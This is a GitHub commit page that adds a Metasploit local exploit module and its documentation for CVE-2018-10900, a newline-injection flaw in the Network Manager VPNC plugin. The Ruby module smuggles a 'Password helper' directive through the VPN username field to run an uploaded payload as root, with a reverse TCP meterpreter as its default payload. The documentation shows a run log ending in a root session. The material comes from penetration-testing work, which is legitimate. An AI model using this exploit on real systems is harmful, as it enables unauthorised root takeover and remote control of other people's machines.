-
Notifications
You must be signed in to change notification settings - Fork 13.7k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #10482, Add Network Manager VPNC Privesc
- Loading branch information
Showing
2 changed files
with
239 additions
and
0 deletions.
There are no files selected for viewing
91 changes: 91 additions & 0 deletions
91
...mentation/modules/exploit/linux/local/network_manager_vpnc_username_priv_esc.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,91 @@ | ||
## Description | ||
|
||
This module exploits an injection vulnerability in the Network Manager | ||
VPNC plugin to gain *root* privileges. | ||
|
||
This module uses a new line injection vulnerability in the configured | ||
username for a VPN network connection to inject a `Password helper` | ||
configuration directive into the connection configuration. | ||
|
||
The specified helper is executed by Network Manager as root when the | ||
connection is started. | ||
|
||
Network Manager VPNC versions prior to 1.2.6 are vulnerable. | ||
|
||
|
||
## Vulnerable Application | ||
|
||
This module has been tested successfully with VPNC versions: | ||
|
||
* 1.2.4-4 on Debian 9.0.0 (x64); and | ||
* 1.1.93-1 on Ubuntu Linux 16.04.4 (x64). | ||
|
||
|
||
## Installation | ||
|
||
The following installation instructions are for Ubuntu 16.04.04. | ||
|
||
```sh | ||
# List available network-manager-vpnc packages | ||
apt-cache showpkg network-manager-vpnc | ||
|
||
# Install a vulnerable package | ||
apt-get install network-manager-vpnc=1.1.93-1 | ||
``` | ||
|
||
|
||
## Verification Steps | ||
|
||
1. Start `msfconsole` | ||
2. Get a session | ||
3. Do: `use exploit/linux/local/network_manager_vpnc_username_priv_esc` | ||
4. Do: `set SESSION [SESSION]` | ||
5. Do: `run` | ||
6. You should get a new *root* session | ||
|
||
|
||
## Options | ||
|
||
**SESSION** | ||
|
||
Which session to use, which can be viewed with `sessions` | ||
|
||
**WritableDir** | ||
|
||
A writable directory file system path. (default: `/tmp`) | ||
|
||
|
||
## Scenarios | ||
|
||
``` | ||
msf5 > use exploit/linux/local/network_manager_vpnc_username_priv_esc | ||
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set session 1 | ||
session => 1 | ||
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set verbose true | ||
verbose => true | ||
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set lhost 172.16.191.188 | ||
lhost => 172.16.191.188 | ||
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > run | ||
[*] Started reverse TCP handler on 172.16.191.188:4444 | ||
[+] nmcli utility is installed | ||
[*] Adding VPN connection... | ||
[*] Uploading payload... | ||
[*] Writing '/tmp/.4FCA0Pp4tw' (237 bytes) ... | ||
[*] Starting VPN connection... | ||
[*] Transmitting intermediate stager...(106 bytes) | ||
[*] Sending stage (861480 bytes) to 172.16.191.201 | ||
[+] Deleted /tmp/.4FCA0Pp4tw | ||
[*] Removing VPN connection... | ||
meterpreter > getuid | ||
Server username: uid=0, gid=0, euid=0, egid=0 | ||
meterpreter > sysinfo | ||
Computer : 172.16.191.201 | ||
OS : Ubuntu 16.04 (Linux 4.13.0-41-generic) | ||
Architecture : x64 | ||
BuildTuple : i486-linux-musl | ||
Meterpreter : x86/linux | ||
meterpreter > | ||
``` | ||
|
148 changes: 148 additions & 0 deletions
148
modules/exploits/linux/local/network_manager_vpnc_username_priv_esc.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,148 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Local | ||
Rank = ExcellentRanking | ||
|
||
include Msf::Post::File | ||
include Msf::Post::Linux::Priv | ||
include Msf::Post::Linux::System | ||
include Msf::Exploit::EXE | ||
include Msf::Exploit::FileDropper | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Network Manager VPNC Username Privilege Escalation', | ||
'Description' => %q{ | ||
This module exploits an injection vulnerability in the Network Manager | ||
VPNC plugin to gain root privileges. | ||
This module uses a new line injection vulnerability in the configured | ||
username for a VPN network connection to inject a `Password helper` | ||
configuration directive into the connection configuration. | ||
The specified helper is executed by Network Manager as root when the | ||
connection is started. | ||
Network Manager VPNC versions prior to 1.2.6 are vulnerable. | ||
This module has been tested successfully with VPNC versions: | ||
1.2.4-4 on Debian 9.0.0 (x64); and | ||
1.1.93-1 on Ubuntu Linux 16.04.4 (x64). | ||
}, | ||
'License' => MSF_LICENSE, | ||
'Author' => | ||
[ | ||
'Denis Andzakovic', # Discovery and exploit | ||
'Brendan Coles' # Metasploit | ||
], | ||
'DisclosureDate' => 'Jul 26 2018', | ||
'References' => | ||
[ | ||
['CVE', '2018-10900'], | ||
['URL', 'http://seclists.org/oss-sec/2018/q3/51'], | ||
['URL', 'https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc'], | ||
['URL', 'https://gitlab.gnome.org/GNOME/NetworkManager-vpnc/commit/07ac18a32b4'], | ||
['URL', 'https://security-tracker.debian.org/tracker/CVE-2018-10900'], | ||
['URL', 'https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-10900.html'], | ||
['URL', 'https://launchpad.net/ubuntu/+source/network-manager-vpnc/0.9.8.6-1ubuntu2.1'], | ||
['URL', 'https://www.debian.org/security/2018/dsa-4253'], | ||
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1605919'], | ||
['URL', 'https://bugzilla.novell.com/show_bug.cgi?id=1101147'] | ||
], | ||
'Platform' => 'linux', | ||
'Arch' => [ARCH_X86, ARCH_X64], | ||
'SessionTypes' => ['shell', 'meterpreter'], | ||
'Targets' => [['Auto', {}]], | ||
'DefaultOptions' => | ||
{ | ||
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', | ||
'WfsDelay' => 10, | ||
'PrependFork' => true | ||
}, | ||
'DefaultTarget' => 0)) | ||
register_options [ | ||
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) | ||
] | ||
end | ||
|
||
def base_dir | ||
datastore['WritableDir'].to_s | ||
end | ||
|
||
def upload(path, data) | ||
print_status "Writing '#{path}' (#{data.size} bytes) ..." | ||
rm_f path | ||
write_file path, data | ||
register_file_for_cleanup path | ||
end | ||
|
||
def upload_and_chmodx(path, data) | ||
upload path, data | ||
cmd_exec "chmod +x '#{path}'" | ||
end | ||
|
||
def check | ||
unless command_exists? 'nmcli' | ||
vprint_error 'Network Manager nmcli utility is not installed' | ||
return CheckCode::Safe | ||
end | ||
vprint_good 'nmcli utility is installed' | ||
|
||
CheckCode::Detected | ||
end | ||
|
||
def exploit | ||
if is_root? | ||
fail_with Failure::BadConfig, 'Session already has root privileges' | ||
end | ||
|
||
if check != CheckCode::Detected | ||
fail_with Failure::NotVulnerable, 'Target is not vulnerable' | ||
end | ||
|
||
@payload_name = ".#{rand_text_alphanumeric rand(10..15)}" | ||
payload_path = "#{base_dir}/#{@payload_name}" | ||
|
||
print_status 'Adding VPN connection...' | ||
vpn_data = [] | ||
vpn_data << '+vpn.data "IKE DH Group = dh2"' | ||
vpn_data << "+vpn.data 'IPSec ID = #{rand_text_alphanumeric 5..10}'" | ||
vpn_data << '+vpn.data "IPSec gateway = 127.0.0.1"' | ||
vpn_data << '+vpn.data "IPSec secret-flags = 4"' | ||
vpn_data << '+vpn.data "Local Port = 0"' | ||
vpn_data << '+vpn.data "NAT Traversal Mode = natt"' | ||
vpn_data << '+vpn.data "Perfect Forward Secrecy = server"' | ||
vpn_data << '+vpn.data "Vendor = cisco"' | ||
vpn_data << '+vpn.data "Xauth password-flags = 4"' | ||
vpn_data << "+vpn.data \"Xauth username = #{rand_text_alphanumeric 5..10}\nPassword helper #{payload_path}\"" | ||
vpn_data << "+vpn.data 'ipsec-secret-type = #{rand_text_alphanumeric 5..10}'" | ||
vpn_data << "+vpn.data 'xauth-password-type = #{rand_text_alphanumeric 5..10}'" | ||
res = cmd_exec "nmcli connection add con-name #{@payload_name} type vpn ifname '*' vpn-type vpnc -- #{vpn_data.join(' ')}" | ||
if res.include? 'Error' | ||
fail_with Failure::Unknown, 'Could not create VPN connection' | ||
end | ||
|
||
res = cmd_exec 'nmcli connection' | ||
unless res.include? @payload_name | ||
fail_with Failure::Unknown, 'Could not create VPN connection' | ||
end | ||
|
||
print_status 'Uploading payload...' | ||
upload_and_chmodx payload_path, generate_payload_exe | ||
|
||
print_status 'Starting VPN connection...' | ||
cmd_exec "nmcli connection up #{@payload_name} & echo " | ||
end | ||
|
||
def cleanup | ||
print_status 'Removing VPN connection...' | ||
res = cmd_exec "nmcli connection delete #{@payload_name}" | ||
unless res.include? 'successfully deleted' | ||
print_warning "Could not remove VPN connection #{@payload_name}" | ||
end | ||
super | ||
end | ||
end |